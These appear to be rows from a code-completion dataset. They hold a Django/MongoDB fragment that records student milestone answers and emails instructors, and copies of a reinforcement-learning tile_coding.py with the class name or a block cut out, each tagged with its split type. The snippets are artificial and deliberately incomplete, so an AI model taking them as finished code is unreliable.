# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
) | random_line_split |
|
tile_coding.py | # -*- coding: utf8 -*-
from typing import List, Tuple
import numpy as np
from yarll.functionapproximation.function_approximator import FunctionApproximator
class | (FunctionApproximator):
"""Map states to tiles"""
def __init__(self, x_low, x_high, y_low, y_high, n_tilings: int, n_y_tiles: int, n_x_tiles: int, n_actions: int) -> None:
super(TileCoding, self).__init__(n_actions)
self.x_low = x_low
self.x_high = x_high
self.y_low = y_low
self.y_high = y_high
self.n_x_tiles = n_x_tiles
self.n_y_tiles = n_y_tiles
self.n_tilings = n_tilings
self.n_actions = n_actions
if self.n_x_tiles % 1 != 0 or self.n_x_tiles <= 0:
raise TypeError("Number of x tiles must be a positive natural number instead of {}".format(self.n_x_tiles))
if self.n_y_tiles % 1 != 0 or self.n_y_tiles <= 0:
raise TypeError("Number of y tiles must be a positive natural number instead of {}".format(self.n_y_tiles))
self.tile_width = (self.x_high - self.x_low) / self.n_x_tiles
self.tile_height = (self.y_high - self.y_low) / self.n_y_tiles
self.tiling_width = self.tile_width * self.n_x_tiles
self.tiling_height = self.tile_height * self.n_y_tiles
self.tile_starts: List[Tuple[float, float]] = []
# Each tiling starts at a random offset that is a fraction of the tile width and height
for _ in range(self.n_tilings):
self.tile_starts.append((
self.x_low + np.random.rand() * self.tile_width,
self.y_low + np.random.rand() * self.tile_height))
self.features_shape = (self.n_tilings, self.n_y_tiles, self.n_x_tiles, self.n_actions)
self.thetas = np.random.uniform(size=self.features_shape) # Initialise randomly with values between 0 and 1
def summed_thetas(self, state, action):
"""Theta values for features present for state and action."""
summed = 0
for i in range(self.n_tilings):
shifted = state - self.tile_starts[i] # Subtract the randomly chosen offsets
x, y = shifted
if (x >= 0 and x <= self.tiling_width) and (y >= 0 and y <= self.tiling_height):
summed += self.thetas[i][int(y // self.tile_height)][int(x // self.tile_width)][action]
return summed
def present_features(self, state, action):
"""Features that are active for the given state and action."""
		result = np.zeros(self.thetas.shape)  # By default, all features are inactive
for i in range(self.n_tilings):
shifted = state - self.tile_starts[i]
x, y = shifted
		if (x >= 0 and x <= self.tiling_width) and (y >= 0 and y <= self.tiling_height):
# Set the feature to active
result[i][int(y // self.tile_height)][int(x // self.tile_width)][action] = 1
return result
| TileCoding | identifier_name |
tile_coding.py | # -*- coding: utf8 -*-
from typing import List, Tuple
import numpy as np
from yarll.functionapproximation.function_approximator import FunctionApproximator
class TileCoding(FunctionApproximator):
"""Map states to tiles"""
def __init__(self, x_low, x_high, y_low, y_high, n_tilings: int, n_y_tiles: int, n_x_tiles: int, n_actions: int) -> None:
super(TileCoding, self).__init__(n_actions)
self.x_low = x_low
self.x_high = x_high
self.y_low = y_low
self.y_high = y_high
self.n_x_tiles = n_x_tiles
self.n_y_tiles = n_y_tiles
self.n_tilings = n_tilings
self.n_actions = n_actions
if self.n_x_tiles % 1 != 0 or self.n_x_tiles <= 0:
raise TypeError("Number of x tiles must be a positive natural number instead of {}".format(self.n_x_tiles))
if self.n_y_tiles % 1 != 0 or self.n_y_tiles <= 0:
raise TypeError("Number of y tiles must be a positive natural number instead of {}".format(self.n_y_tiles))
self.tile_width = (self.x_high - self.x_low) / self.n_x_tiles
self.tile_height = (self.y_high - self.y_low) / self.n_y_tiles
self.tiling_width = self.tile_width * self.n_x_tiles
self.tiling_height = self.tile_height * self.n_y_tiles
self.tile_starts: List[Tuple[float, float]] = []
# Each tiling starts at a random offset that is a fraction of the tile width and height
for _ in range(self.n_tilings):
|
self.features_shape = (self.n_tilings, self.n_y_tiles, self.n_x_tiles, self.n_actions)
self.thetas = np.random.uniform(size=self.features_shape) # Initialise randomly with values between 0 and 1
def summed_thetas(self, state, action):
"""Theta values for features present for state and action."""
summed = 0
for i in range(self.n_tilings):
shifted = state - self.tile_starts[i] # Subtract the randomly chosen offsets
x, y = shifted
if (x >= 0 and x <= self.tiling_width) and (y >= 0 and y <= self.tiling_height):
summed += self.thetas[i][int(y // self.tile_height)][int(x // self.tile_width)][action]
return summed
def present_features(self, state, action):
"""Features that are active for the given state and action."""
		result = np.zeros(self.thetas.shape)  # By default, all features are inactive
for i in range(self.n_tilings):
shifted = state - self.tile_starts[i]
x, y = shifted
		if (x >= 0 and x <= self.tiling_width) and (y >= 0 and y <= self.tiling_height):
# Set the feature to active
result[i][int(y // self.tile_height)][int(x // self.tile_width)][action] = 1
return result
| self.tile_starts.append((
self.x_low + np.random.rand() * self.tile_width,
self.y_low + np.random.rand() * self.tile_height)) | conditional_block |
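# Hedged usage sketch (added, not part of tile_coding.py): build a small
# coder over the unit square and query one state-action value. The base
# FunctionApproximator comes from yarll and is assumed to accept n_actions
# as the constructor above implies. Note that because every tiling is
# shifted by a positive random offset, states at the very high edge can
# fall outside some tilings and contribute nothing to the sum.
_tc = TileCoding(x_low=0.0, x_high=1.0, y_low=0.0, y_high=1.0,
                 n_tilings=4, n_y_tiles=8, n_x_tiles=8, n_actions=3)
_q = _tc.summed_thetas(np.array([0.5, 0.5]), 0)          # sum of up to 4 thetas
_active = _tc.present_features(np.array([0.5, 0.5]), 0)  # 0/1 indicator array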